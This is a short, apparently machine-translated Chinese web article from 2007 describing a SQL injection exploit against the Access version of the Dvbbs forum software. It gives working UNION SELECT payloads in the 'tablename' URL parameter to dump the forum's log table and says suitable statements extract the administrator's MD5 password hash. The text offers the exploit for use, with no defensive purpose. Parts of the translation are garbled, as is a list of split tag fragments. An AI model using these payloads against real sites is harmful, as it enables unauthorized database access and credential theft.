SoFunction
Updated on 2025-04-13

The ultimate log library for the access version of the dynamic network

The ultimate log library for the access version of the dynamic network

Updated: January 16, 2007 00:00:00 Submission: mdxy-dxy
The ultimate log library for the access version of the dynamic network

Note: You need to obtain the front-end administrator permission before using it

In the article, specify ?tablename=Dv_bbs1%20union%20select%201,1,l_content,1,1,1%20from%20dv_log%20where%20l_id=5%20union%20select%201,1,1,1,1%20from%20dv_bbs1&page=2000 (id of the last page of the recycling bin), which means changing the value of l_id='' to burst out the value of l_concent can only burst one content at a time. After looking at the database table of Dongwang, just specify l_a nnounceid=0 can all be broken out. The statement is constructed in this way?tablename=Dv_bbs1%20union%20select%201,1,l_content,1,1,1%20from%20dv_log%20where%20l_announceid=0%20union%20select%201,1,1,1,1%20from%20dv_bbs1&page=2000 Hehe, are all broken out? Constructing appropriate statements can break out the administrator's background md5 value and other content. Also note: The content of the burst data field is the last page of the Recycle Bin post!

  • Moving.com
  • Neta
  • ac
  • cc
  • ce
  • es
  • ss
  • s version
  • Breaking
  • Brutal l
  • lo
  • og
  • g library
  • Library end
  • ultimate
  • great

Related Articles

  • Cross-library query for Access (picture)

    Cross-library query for Access (Figure)...
    2007-01-01
  • The shellcode source code of the "shockwave" virus

    The shellcode source code of the "shockwave" virus...
    2007-01-01
  • Preliminary study on online payment loopholes in cloud network (photo)

    This article mainly introduces the preliminary exploration of online payment vulnerabilities in cloud network
    2007-01-01
  • Details of fckeditor vulnerability

    Fckeditor's vulnerability details...
    2007-02-02
  • Honeypot Technology: Eliminate Firewall Limits and Fragility

    Honeypot Technology: Eliminates the limitations and fragility of firewalls...
    2007-01-01
  • "Gray Dove" web * from principle, production to prevention (photo)

    "Gray Dove" web * from principle, production to prevention (picture)...
    2007-01-01
  • Analysis of the footprints left by entering Win2000

    Analysis of the footprints left by entering Win2000...
    2007-01-01
  • Also talk about cross-site utilization

    Also talk about cross-site utilization...
    2007-04-04
  • phpwind management permission leak exploit program release

    phpwind is a very widely used program in China. Due to errors in programming, anyone can obtain the permissions of front-end administrators and slut masters, and do any operations such as deleting posts.
    2008-06-06
  • WordPress download monitoring plugin id parameter SQL injection vulnerability

    Release time: 2008-04-28 Update time: 2008-04-30 Hazard level: ★★★☆☆☆ Affected version: WordPress Download Monitor 2.0.6 describe: BUGTRAQ ID: 28975
    2008-05-05

Latest Comments